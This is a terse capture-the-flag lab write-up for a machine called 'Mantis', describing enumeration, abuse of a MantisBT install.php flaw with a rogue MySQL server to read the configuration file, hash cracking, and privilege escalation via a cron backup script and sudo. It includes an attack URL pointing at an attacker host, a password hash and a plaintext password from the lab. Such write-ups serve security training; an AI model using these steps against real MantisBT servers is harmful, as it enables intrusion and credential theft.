Mantis 🔸

Enumeration

Web server shows a template of a landing page. feroxbuster discovers a /bugtracker.

Searching for an exploit, we find https://mantisbt.org/bugs/view.php?id=23173.

Initial Access

We start the rogue server from https://github.com/allyshka/Rogue-MySql-Server.

Visit http://192.168.169.204/bugtracker/admin/install.php?install=3&hostname=192.168.45.206

We can read config_inc.php file after seeing it in the mantis repo.

We have the database credentials.

c7870d0b102cfb2f4916ff04e47b5c6f

Using hashcat.

https://mantisbt.org/bugs/view.php?id=26091

Get the flag.

Privilege Escalation

We see a backup script but can't see it; there is a cron job.

Using pspy64.

We see the password BugTracker007.

sudo -l shows that mantis has full privileges, so...

Post Exploitation

Get the flag.